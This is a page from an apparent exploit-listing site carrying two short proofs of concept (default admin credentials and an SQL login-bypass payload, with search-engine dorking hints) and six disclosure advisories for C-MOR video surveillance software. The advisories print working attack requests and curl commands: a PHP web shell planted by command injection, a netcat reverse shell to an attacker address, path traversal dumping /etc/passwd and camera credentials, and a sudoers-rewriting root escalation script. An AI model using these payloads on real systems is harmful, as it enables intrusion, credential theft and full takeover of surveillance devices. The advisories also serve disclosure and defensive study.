Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Online Survey System 1.0 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user&pass = ' or 0=0 ## [+] http://127.0.0.1/survey/ Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>Advisory ID: SYSS-2024-030 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45179 Authors of Advisory: Matthias Deeg (SySS GmbH), Chris Beiter, Frederik Beimgraben, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to insufficient input validation, the C-MOR web interface is vulnerable to OS command injection attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that different functionality is vulnerable to OS command injection attacks, for example for generating new X.509 certificates or setting the time zone. The OS command injection vulnerability in the script "generatesslreq.pml" can be exploited as a low-privileged authenticated user (see SYSS-2024-024[3]) in order to execute commands in the context of the Linux user "www-data". The OS command injection vulnerability in the script "settimezone.pml" requires an administrative user for the C-MOR web interface. By also exploiting the privilege escalation vulnerability described in SYSS-2024-027[4], it is possible to execute commands on the C-MOR system with root privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By sending the following HTTP POST request to the script "generatesslreq.pml", the injected OS command via the parameter "city" is executed as Linux user "www-data". In this sample attack vector, a simple PHP web shell is created in the backup directory within the web server's webroot: POST /generatesslreq.pml HTTP/1.1 Host: <HOST> Authorization: Basic <CREDENTIALS> Content-Type: application/x-www-form-urlencoded Content-Length: 152 Connection: close countrycode=de&state=state&city=city'|echo '<?php echo system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php #&organization=org&servername=syss This PoC attack can be performed using the following curl command: curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php #&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>" --ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml The uploaded web shell can be used via the following URL: https://<HOST>/backup/web shell.php?cmd=<COMMAND> In version 6.00PL01, an OS command injection was, for instance, possible using the following attack vector: curl -X POST \ -d 'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26' \ --user "<USERNAME>:<PASSWORD>" \ --insecure \ --ciphers 'DEFAULT:!DH' \ https://<HOST>/en/setdatetime.pml ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The described security vulnerability has not been fixed entirely in the newly released software version 6.00PL01. There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-030 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt [3] SySS Security Advisory SYSS-2024-024 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt [4] SySS Security Advisory SYSS-2024-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben, and Matthias Deeg. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-028 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: Cleartext Storage of Sensitive Information (CWE-312) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45175 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Sensitive information is stored in cleartext. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR system, it was found that sensitive information, for example login credentials of cameras, is stored in clear text. Thus, an attacker with file system access, for example exploiting a path traversal attack (see SYSS-2024-025[3]), has access to the login data of all configured cameras or the configured FTP server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): By exploiting the path traversal attack in the backup download script "download-bkf.pml", login credentials of cameras can be retrieved, as the following HTTP request and the corresponding response demonstrate: POST /download-bkf.pml HTTP/1.1 Host: <HOST> Authorization: Basic <CREDENTIALS> Content-Type: application/x-www-form-urlencoded Content-Length: 24 Connection: close bkf=../../../etc/ip.cam1 HTTP/1.1 200 OK (...) 192.168.1.11 80 <USERNAME> <PASSWORD> This PoC attack can be performed using the following curl command: curl -X POST -d 'bkf=../../../etc/ip.cam1' --user '<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' https://<HOST>/download-bkf.pml 192.168.1.11 80 <USERNAME> <PASSWORD> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt [3] SySS Security Advisory SYSS-2024-025 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, and Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-027 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: Improper Privilege Management (CWE-269) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45173 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper privilege management concerning sudo privileges, C-MOR is vulnerable to a privilege escalation attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]), it was found that the Linux user "www-data" running the C-MOR web interface can execute some OS commands as root via sudo without having to enter the root password. These commands, for example, include "cp", "chown", and "chmod", which enable an attacker to modify the system's sudoer file in order to execute all commands with root privileges. Thus, it is possible to escalate the limited privileges of the user "www-data" to root privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): For demonstrating a privilege escalation attack with shell access as the user "www-data", the following shell script was uploaded to the C-MOR system and executed: $ cat privesc.sh sudo cp /etc/sudoers /home/cam sudo chown www-data /home/cam/sudoers sudo chmod 777 /home/cam/sudoers echo 'www-data ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers sudo chmod 440 /home/cam/sudoers sudo chown root /home/cam/sudoers sudo cp /home/cam/sudoers /etc/sudoers sudo rm /home/cam/sudoers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt [3] SySS Security Advisory SYSS-2024-026 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-026 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401 Tested Version(s): 5.2401 Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-04-05 Solution Date: 2024-07-31 Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45171 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper user input validation, it is possible to upload dangerous files, for instance PHP code, to the C-MOR system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that the upload functionality for backup files allows an authenticated user to upload arbitrary files. The only condition is that the file name contains the string ".cbkf". Therefore, "webshell.cbkf.php" is considered a valid file name for the C-MOR web application. Uploaded files are stored within the directory "/srv/www/backups" on the C-MOR system and can thus be accessed via the URL https://<HOST>/backup/upload_<FILENAME>. Due to broken access control, also low-privileged authenticated users can use this file upload functionality (see SYSS-2024-024[3]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the upload functionality for backup files, it is possible to upload arbitrary PHP code, for instance a simple PHP web shell such as the following one, in a file named "webshell.cbkf.php": <?php echo system($_GET['cmd'); ?> After a successful file upload, the uploaded PHP web shell can be accessed and used via the following URL, leading to OS command execution: https://<HOST>/backup/upload_webshell.cbkf.php?cmd=<COMMAND> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install C-MOR Video Surveillance version 6.00PL1. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-026 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt [3] SySS Security Advisory SYSS-2024-024 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-025 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401 Tested Version(s): 5.2401 Vulnerability Type: Relative Path Traversal (CWE-23) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-04-05 Solution Date: 2024-07-31 Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45178 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper user input validation, it is possible to download arbitrary files from the C-MOR system via a path traversal attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that different functionalities are vulnerable to path traversal attacks, which is due to insufficient user input validation. For instance, the download functionality for backups provided by the script "download-bkf.pml" is vulnerable to a path traversal attack via the parameter "bkf". This enables an authenticated user to download arbitrary files as Linux user "www-data" from the C-MOR system. Another path traversal attack is in the script "show-movies.pml", which can be exploited via the parameter "cam". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the following HTTP POST request with the relative path "../../../../etc/passwd" as value for the parameter "bkf", it is possible to download the file "/etc/passwd": POST /download-bkf.pml HTTP/1.1 Host: <HOST> Authorization: Basic <CREDENTIALS> Content-Type: application/x-www-form-urlencoded Content-Length: 26 bkf=../../../../etc/passwd An example of a successful path traversal attack is demonstrated via the following curl command: $ curl -X POST -d 'bkf=../../../../etc/passwd' --user '<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' https://<HOST>/download-bkf.pml root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash postfix:x:104:107::/var/spool/postfix:/bin/false stunnel4:x:105:109::/var/run/stunnel4:/bin/false mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false messagebus:x:107:113::/var/run/dbus:/bin/false ntp:x:108:114::/home/ntp:/bin/false download:x:1002:1002:Download User:/home/download:/bin/bash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install C-MOR Video Surveillance version 6.00PL1. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-025 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben, and Matthias Deeg. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-024 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401 Tested Version(s): 5.2401 Vulnerability Type: Improper Access Control (CWE-284) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-04-05 Solution Date: 2024-07-31 Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45170 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper or missing access control, low-privileged users can use administrative functions of the C-MOR web interface. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that different functions are only available to administrative users. However, access to those functions is restricted via the web application user interface and not checked on the server side. Thus, by sending corresponding HTTP requests to the web server of the C-MOR web interface, low-privileged users can also use administrative functionality, for instance downloading backup files or changing configuration settings. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): In this example, a low-privileged user downloads backup files by directly sending a corresponding HTTP POST request to the page "download-bkf.pml". For this, the following HTML code can be used: <html> <body> <form action="https://<HOST>/download-bkf.pml" method="POST"> <input type="text" name="bkf" value="" placeholder="Please insert the file name." /> <input type="submit" value="Download"> </form> </body> </html> This PoC attack can also be performed using the following curl command: curl -X POST -d '<FILENAME>' --user '<USERNAME:PASSWORD>' --ciphers 'DEFAULT:!DH' https://<HOST>/download-bkf.pml ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install C-MOR Video Surveillance version 6.00PL1. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-024 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. 